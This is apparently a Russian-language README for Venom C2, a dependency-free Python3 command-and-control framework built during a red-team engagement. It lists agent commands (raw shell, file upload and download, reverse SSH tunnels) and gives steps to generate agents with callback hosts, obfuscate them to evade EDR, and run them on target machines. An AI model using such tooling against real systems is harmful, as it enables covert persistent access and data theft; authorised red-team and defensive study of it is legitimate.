
Venom C2 — это не имеющая зависимостей платформа Command & Control на Python3 для персистентности redteam.

Venom C2 — это независимый от зависимостей фреймворк Command & Control на Python3 для обеспечения постоянства на этапе redteam, созданный для работы в системах без установки пакетов. Он включает сервер команды на Flask, операторский GUI на Electron и однострочный агент на Python, который обменивается данными по HTTP/HTTPS с использованием настраиваемых AES-зашифрованных JSON-сообщений. Используйте его для выполнения команд, управления файлами, поддержания доступа и создания обратных SSH-туннелей с скомпрометированных систем.
При повышении сетевых привилегий мы сталкивались со многими производственными системами, работающими на экзотических дистрибутивах и архитектурах. Мы хотели настроить постоянство, но наш арсенал инструментов и техник не работал. Кроме того, на некоторых целевых системах работал EDR.
Это были производственные системы, поэтому мы не хотели устанавливать пакеты. Нам требовался C2-агент, который работал бы без зависимостей. На системах был установлен Python3, поэтому я создал Venom C2 прямо в ходе задания: независимый от зависимостей C2-агент на Python3, который просто работает.
Мы не хотели использовать готовые C2-агенты из-за риска, что они могут быть обнаружены синей командой. Уникальный код — король для обхода современных EDR
Поскольку систем было много, мы автоматизировали уникальную обфускацию, именование, размещение в файловой системе, различные сетевые домены обратного вызова и уникальные пути сетевых запросов для каждого агента.

Я назвал его Venom, потому что мой сын обожает злодея Венома из Человека-паука. К тому же Python — змея, а у крутых змей есть яд (venom), так что название подошло идеально.
Его нет.
Это был всего лишь разовый проект C2, который я сделал в ходе задания. На разработку потребовалось около 2 дней, чтобы сделать его стабильным и надежным в целевой среде. Он выполнил свою задачу, обеспечив нам постоянство в сети на оставшиеся 6 недель задания. У меня нет планов продолжать разработку или использовать этот проект, поэтому я решил, что его можно выложить в открытый доступ.
Иначе он просто канул бы в devNULL...


[11-04-2025 11:31 AM MST] admin help
help : Показать это меню справки
ls : Вывести содержимое каталога
pwd : Показать текущую рабочую директорию
cd : Сменить директорию
cat : Показать содержимое файла
mv : Переместить/переименовать файлы или каталоги
cp : Скопировать файлы или каталоги
mkdir : Создать каталог
rmdir : Удалить пустой каталог
write : Записать содержимое в файл
chmod : Изменить права доступа к файлу
rm : Удалить файлы
shell : Выполнить сырую команду оболочки
sleep : Установить режим сна агента с опциональным джиттером
sshrev : Создать обратный SSH-туннель
kill : Завершить процесс агента
upload : Загрузить файл с вашего локального компьютера оператора на удаленный компьютер агента
download : Скачать файл с удаленного компьютера агента на локальный компьютер оператора
git clone https://github.com/boku7/venom
cd venom
pip3 install -r server/requirements.txt
cd server
python3 server.py --help
python3 server.py
python3 server.py --adduser <ИМЯ_ПОЛЬЗОВАТЕЛЯ> <ПАРОЛЬ>Запустите клиентский интерфейс на своей рабочей станции (не на сервере). Он должен иметь доступ к серверу.
cd ../client
npm install
npm run start
Откройте клиент, перейдите в Config и введите учетные данные сервера.
Базовый путь API клиента сервера — /api/. Не открывайте /api/ в публичный интернет. Используйте VPN или строгие правила брандмауэра/обратного прокси, чтобы только доверенные клиенты могли получить к нему доступ.
Из каталога server:
python3 agent_create.py -H <хост_сервера> -P <порт_сервера> [-http]
Из каталога server:
python3 agent_obfuscate.py agents/<сгенерированный_файл_агента>.py
Запускается на целевом компьютере, которым вы хотите управлять.
python3 /Users/bobby/venom/server/obfuscate/output/obfuscated_agent_20251104_110902.py